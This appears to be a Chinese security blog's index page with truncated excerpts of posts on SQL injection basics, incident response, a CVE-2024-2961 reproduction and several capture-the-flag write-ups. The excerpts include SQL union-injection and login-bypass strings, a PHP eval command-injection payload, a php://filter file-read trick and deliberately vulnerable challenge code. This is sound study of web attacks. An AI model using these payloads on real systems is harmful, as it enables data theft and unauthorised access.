深入浅出sql注入
0x01sql注入前置讲这个知识之前我们得先问自己几个问题 什么是数据库?简单来说,数据库就是“数据”的“仓库”。数据库是一个组织化的数据集合,用于存储、管理和检索信息。它为存储数据提供了一种格式化的方式,并允许用户和应用程序有效地查询、更新和管理这些数据。数据库中包含表、关系以及操作对象,数据存储在表中。 什么是sql?SQL是结构化查询语言,是一种用于与关系数据库进行交互的标准编程语言。它用于定义、操作和控制数据,以及管理数据库。SQL 是一种高度通用的语言,几乎所有的数据库管理系统(RDBMS)都支持SQL,包括MySQL、PostgreSQL、Microsoft SQL Server 和 Oracle 等。 sql里有四大最常见的操作,即增删查改: 增。增加数据。其简单结构为: INSERT table_name(columns_name) VALUES(new_values)。 删。删除数据。其简单结构为: DELETE table_name WHERE condition。 查。查找数据。其简单结构为:SELECT columns_name FROM...
应急响应日志分析汇总(持续更新)
0x01前言应急响应的话我认为是每一个学信安的人需要去学习的,所以我也是对此进行了响应的学习和积累,希望在以后发生真实的事件时能第一时间进行良好的反馈 借鉴师傅的文章:(这里的话还是有点多的,毕竟这个话题的分区还是蛮多的) https://bypass007.github.io/Emergency-Response-Notes/Summary/%E7%AC%AC1%E7%AF%87%EF%BC%9AWindow%E5%85%A5%E4%BE%B5%E6%8E%92%E6%9F%A5.html windows入侵排查:https://www.freebuf.com/articles/network/286270.html windows分析事件日志:https://zone.huoxian.cn/d/868-windows 常见Windows事件ID状态码:https://www.cnblogs.com/chddt/p/13262385.html 0x02应急响应在学习应急响应之前,我们首先要先了解什么是应急响应 什么是应急响应?应急响应(Incident Response...
ctfshow内部赛
签到一个登录界面,在源码中找到一个注册的路由,并且有备份文件源码泄露 1234567891011121314151617181920212223242526272829303132//login.php<?phpfunction check($arr){if(preg_match("/load|and|or|\||\&|select|union|\'|=| |\\\|,|sleep|ascii/i",$arr)){ echo "<script>alert('bad hacker!')</script>"; die(); }else{ return...
ctfshow36D练手赛+36D杯
36D练手赛不知所措.jpg需要GET传入file参数且file参数必须有test 传入test.显示没有flag,不过可以确定是存在文件包含的,但是这里有test的阻碍的话该怎么正确读取文件呢? 官方手册中认证的参数只有这几个,所以传入的其他参数是不会被解析的 1?file=php://filter/read=conver.base64-encode/test这里随便写/resource=flag. 我本来是试着去读flag的,但是没读出来 试试index看看能不能读到源代码,然后也是成功读到了index.php文件的源码,我们拿去解码一下 1234567891011<?phperror_reporting(0);$file=$_GET['file'];$file=$file.'php';echo $file."<br />";if(preg_match('/test/is',$file)){ include...
CVE-2024-2961漏洞复现
漏洞信息0x01漏洞描述 其实就是PHP利用glibc...
ctfshow西瓜杯
CodeInject12345678<?php#Author: h1xaerror_reporting(0);show_source(__FILE__);eval("var_dump((Object)$_POST[1]);"); 这里的话会将传入的内容转化成对象,这里的话尝试闭合就行 11=1);phpinfo();# 11=1);system("cat /000f1ag.txt");# tpdoor页面提示缓存被禁用 这图标是tp的,先审一下源码吧 12345678910111213141516171819202122232425262728<?phpnamespace app\controller;use app\BaseController;use think\facade\Db;class Index extends BaseController{ protected $middleware =...
DASCTF2024最后一战(已做完)
const_python自认为搭建了一个完美的web应用,不会有问题,很自信地在src存放了源码,应该不会有人能拿到/flag的内容。 访问/src拿到源码 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647import builtinsimport ioimport sysimport uuidfrom flask import Flask, request,jsonify,sessionimport pickleimport base64app = Flask(__name__)app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "")class User: def __init__(self, username, password, auth='ctfer'): ...
ctfshow入门SQL注入
未过滤注入web171可以用正常的联合注入,也可以用万能密码 121' or '1'='1'--+1' || 1--+ 联合注入 1234561' order by 4--+ -1' union select 1,2,3--+-1' union select 1,2,database()--+-1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database())--+-1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='ctfshow_user')--+-1' union select 1,2,(select password...
PHP的一些小技巧
...